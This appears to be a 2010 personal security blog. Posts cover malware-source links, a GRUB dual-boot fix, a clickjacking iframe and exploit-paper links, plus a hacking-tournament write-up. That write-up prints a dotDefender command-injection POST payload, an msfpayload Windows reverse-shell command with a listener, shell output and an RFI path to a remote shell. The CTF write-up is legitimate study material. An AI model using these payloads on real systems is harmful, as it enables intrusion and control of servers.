Wednesday, 13 October 2010

List of Malware Sources

i'm found a collection of list sites that provide links to Malware here...

List of Malware Sources

before start clicking remember you are just start with working fire.... copy paste link here

Command to watch tcp connection

very useful command just and here to bookmark. may be i was found more this like command fu in http://www.shell-fu.org/ check it out.

watch -n 1 "netstat -tpanl | grep ESTABLISHED"

Saturday, 2 October 2010

backtrack4 and windows 7 dual boot

i'm getting some problem about installing backtrack4 and windows 7 in a new hdd. I just start with a bookable pen-drive previously made by unetbootin with backtrack4 rc1.

every thing fine just install backtack4 rc1 and reboot ,,,boom just a cursor blink _

opps my boot loader installed on pen-drive. without pen-drive i can't boot. just reboot with plug in pen drive every thing ok. then i fix the grub with following this.

shortly
sudo grub
find /boot/grub/stage1
root (hd0,0)
setup (hd0)

i have to use use legacy grub method because backtrack rc1 use grub version 0.97.

So far so good now time to install win7

so start making boot disk with unetbootin opps unetbootin can't make win7 bootable.

then try Windows7-USB-DVD-Download-Tool ,shit not worked for me,and finally try Novicorp WinToFlash 0.6.0011 beta thats help and its good.

win7 installed and then again boot backtrack4 from a boot able pen drive and fix grub with
sudo grub
find /boot/grub/stage1
root (hd0,0)
setup (hd0)

reboot opps no menu for win7

ok edit kwrite/boot/grub/menu.lst with

title Windows 7
root (hd0,4)
makeactive
chainloader +1

reboot opps( hd0,4) = 'Invalid Device Selected' ok then try

title Windows 7
root (hd0,3)
makeactive
chainloader +1

opps again
(hd0,3) = 'BOOTMGR' is missing '

ohoo dam...try

title Windows 7
root (hd0,2)
makeactive
chainloader +1

haha its working ....

see more detains why need to decrease root (hdA,B) B value on here

Wednesday, 23 June 2010

Offensive Security Hacking Tournament – Report How strong is your Fu


Introduction

Offensive security through a hacking tournament on online on the 9th to 10th may 2010.Total duration was predefine 48 hours.Registered contestant got basic information after login a blog post where the challenges describe.Basic challenges are in two phase following paragraph has the objective as putted on web.   

“Phase 1″ – you must hack our noob filter machine and extract a file called n00bSecret.txt from the local filesystem. Once you have the key, you have 10 minutes to submit it into the control panel.

“Phase 2″ – The control panel will provide you with VPN files. Your VPN account will be automatically activated once you submit a correct “Phase 1″ secret key. It will take 5 minutes for your account to get activated.

This report contains sub-sections. Each Sub-section discusses in detail all relevant issues or avenues used to compromise and to gain unauthorized access to sensitive information.



Global Objectives
1. First objective is straight forward  find a secret key is called n00bSecret.txt. two same target 
2. Second  goal is compromise two server with following hits and collect a secret key as proof   
  • FTP Credentials are : devil / killthen00b
  • Internal VPN IP’s – 192.168.6.66/67/68 (all same) and 192.168.6.70/71/72 (all same).

after achieved the first goal its clear to distinguished two separated goal
2.1. 192.168.6.70/71/72 (name Kilthen00b)
2.2. 192.168.6.66/67/68 (name Ghost)  
Global Objective Summary
Objective 1    :  Achieved
Objective 2.1  : Achieved
Objective 2.1  :  Not Completed (But collect some potential vulnerability on server

Machine ip
Vulnerability Type
Risk / Impact

Objective 1    :  Achieved
67.23.72.4
67.23.72.5
(find a secret key is called n00bSecret.txt.)
1. information leakage. 
2. Weak Passwords identified
3. Remote Command execute.
1. CRITICAL
2. With executing remote command get full control on machine. 

Objective 2.1  : Achieved
192.168.6.70/71/72 (name Kilthen00b)
1.Possible to execute *.exe(executable) file from web link.
1. CRITICAL
2. With a reverse shell can own full cotrol to machine.

Objective 2.1  :  Not Completed
192.168.6.66/67/68 (Ghost)
(But collect some potential vulnerability on server
1. With  bruthforceing directory find some potentially vunarable data
1. CRITICAL



Details work flow how to gain objective
Objective 1    :  Achieved 192.168.6.70/71/72
(find a secret key is called n00bSecret.txt.)
Only 80 port found open on this server(192.168.6.70) at the contest start moment 22 port found open but that closed after some moment.
With some raw http request ( nc -v 67.23.72.4 80) the box ox type and the web server is detected.
HEAD HTTP/1.0
HTTP/1.1 400 Bad Request
Date: Wed, 05 May 2010 04:53:59 GMT
Server: Apache/2.2.14 (Fedora)
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.14 (Fedora) Server at host-67-23-72-4.biznesshosting.net Port 80</address>
</body></html>
HEAD HTTP/1.0
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.14 (Fedora) Server at host-67-23-72-4.biznesshosting.net Port 80</address>
</body></html>
And later on with tampering the post data found following  output the red mark disclosed some information that help to proceed next.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
        <head>
                <title>Blocked Your Request</title>
<meta name="description" content="Applicure is the leading provider of web application security. We  create products for web application protection, including web application firewall, ISA security and IIS security." />
                <meta name="keywords" content="web application protection, web application firewall, isa security, iis security, web site security, web application security">
                <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
                <style type="text/css">
                        body{
                                margin: 0px;
                                font-family: Verdana, sans-serif;
                                font-size: 12px;
                        }
                        div#box{
                                width: 475px;
                                border: solid 1px #5183b4;
                                text-align: left;
                        }
                        h1{
                                font-size: 22px;
                                color: #D70637;
                                font-weight: bold;
                                text-align: center;
                        }
                        a{
                                color: black;
                        }
                        a:hover{
                                color: #5183b4;
                        }
                </style>
        </head>
        <body><br />
                <center>
HAHAHAHA!
                </center>
        </body>
</html>

Search with metadata string on google bring that this site protected by dotDefender (www.applicure.com) that has a public vurnabillity http://www.exploit-db.com/exploits/10261.
But the exploit only work after bypass basic Authentication login. And then got a weak password(admin/password) on http://67.23.72.4/dotDefender. then with exploit and help of hackerbar(add on firefox) can execute basic command in the target box.
first locate n00bSecret.txt
then cat the file to get the key.
on the hacker bar post http://67.23.72.4/dotDefender with
sitename=dotdefeater&deletesitename=dotdefeater;locate n00bSecret.txt;&action=deletesite&linenum=12
to locate the file and the post with
sitename=dotdefeater&deletesitename=dotdefeater;cat /opt/guid/n00bSecret.txt;&action=deletesite&linenum=12
Objective 2.1  : Achieved 192.168.6.70/71/72 (name Kilthen00b)
In this objective  a FTP Credentials are ( devil / killthen00b ) are given . After vpn to lab with simple hit on http://192.168.6.70 with browser
a web mail portal found running on port 80.
a bit more digging found other port also open on that server

21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
143/tcp  open  imap
366/tcp  open  odmr
465/tcp  open  smtps
587/tcp  open  submission
993/tcp  open  imaps
995/tcp  open  pop3s
3389/tcp open  ms-term-serv
7025/tcp open  unknown
7443/tcp open  unknown
after more investigate on the top of browser this (http://192.168.6.70/scripts/webmail.exe) short of link make the sense that and exe can be run directly from the browser.Next with the ftp credential on the target server need to find out the scripts folder.

Welcome to SurgeMail (WebMail port)
The following are the main end user surgemail interface pages. You may want to place links to these on your main web pages:
- A hotmail like interface for users to access email. (SSL Secure version)
- Web interface for account self management; change password, forwarding etc. (SSL Secure version)
- Web interface for domain administrators for creating new accounts, modifying passwords, forwarding rules etc.
This page is ./surgemail/web/index.htm, you may want to tailor it, as users will see this page as the default page using the web interface on the webmail port.
Alternatively, to make webmail the default displayed page use the following surgemail configuration setting:
    g_url_alias from="/" to="/scripts/webmail.exe" ports="80"
scripts directory found easily on the server.The next job is quite straight forward "put a reverse shell on scripts directory".  To do this metasploit helps
/msfpayload windows/shell_reverse_tcp LHOST=192.168.6.198 LPORT=40867 X > /tmp/r.exe
puts the r.exe on target server and hit that from browser http://192.168.6.70/scripts/r.exe. On the other side a metasploit multi handler wait for connection back.
exploit/multi/handler
after getting a true shell now need to found the key have to submit on the game control panel.

c:\surgemail\scripts>cd c:
cd c:
c:\surgemail\scripts
c:\surgemail\scripts>cd ..
cd ..
c:\surgemail>cd ..
cd ..
c:\>cd user
c:\>cd users
cd users
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0CDF-A146
Directory of c:\Users\Administrator\Desktop
05/03/2010  11:59 PM    <DIR>          .
05/03/2010  11:59 PM    <DIR>          ..
05/03/2010  11:59 PM                32 proof.txt
               1 File(s)             32 bytes
               2 Dir(s)   2,694,205,440 bytes free
c:\Users\Administrator\Desktop>type proof.txt
type proof.txt
a61b0c1bf71267289efeecf778b1e51e

Objective 2.1 :  Not Completed
192.168.6.66/67/68 (Ghost)
(But collect some potential vulnerability on server
No clue no xss no sql injection and aslo port scan not possible on this server.But with dirbuster by OWASP found some potential directory on server one of them is 192.168.6.66/1/ that contains a login page
with search some key word getting from the source of the login page is seems using 

http://www.mariovaldez.net/software/sitefilo/

a bit more research found this (http://www.milw0rm.com/exploits/7444) public exploit that seems working 
/1/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
that indicate that this server also may vulnerable by RFI or LFI http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/ attacker can upload web shell and  command and control the server.
Conclusions
Its fun and get a nice experience to join this tournament. 

Monday, 14 June 2010

Found Click jack attack from http://101hottestwomen.com on facebook

i'm publish source of that page here
http://docs.google.com/View?id=dd5gk5hj_0hqm9rbhp

hidden iframe look like this

iframe src="http://www.facebook.com/plugins/like.php?href=http://101hottestwomen.com&layout=standard&show_faces=true&width=450&action=like&font&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border-width: initial; border-color: initial; width: 20px; height: 20px; " allowtransparency="true" id="xxx" name="xxx"

Sunday, 13 June 2010

All about exploit

Just collecting link on exploit paper or link here

Most recent

slide
full-paper
In this text we describe how to write a shellcode for new JIT-Spray attacks and make universal STAGE 0 shellcode that gives control to any common shellcode from MetaSploit, for example.
Author: Alexey Sintsov
http://www.dsecrg.com/files/pub/pdf/Writing%20JIT-Spray%20Shellcode%20for%20fun%20and%20profit.pdf





Best tutorial about exploit develop ever


Nice presentation about SEH Based Exploitation by Umair Manzoor (UmZ).


Bypassing SEHOP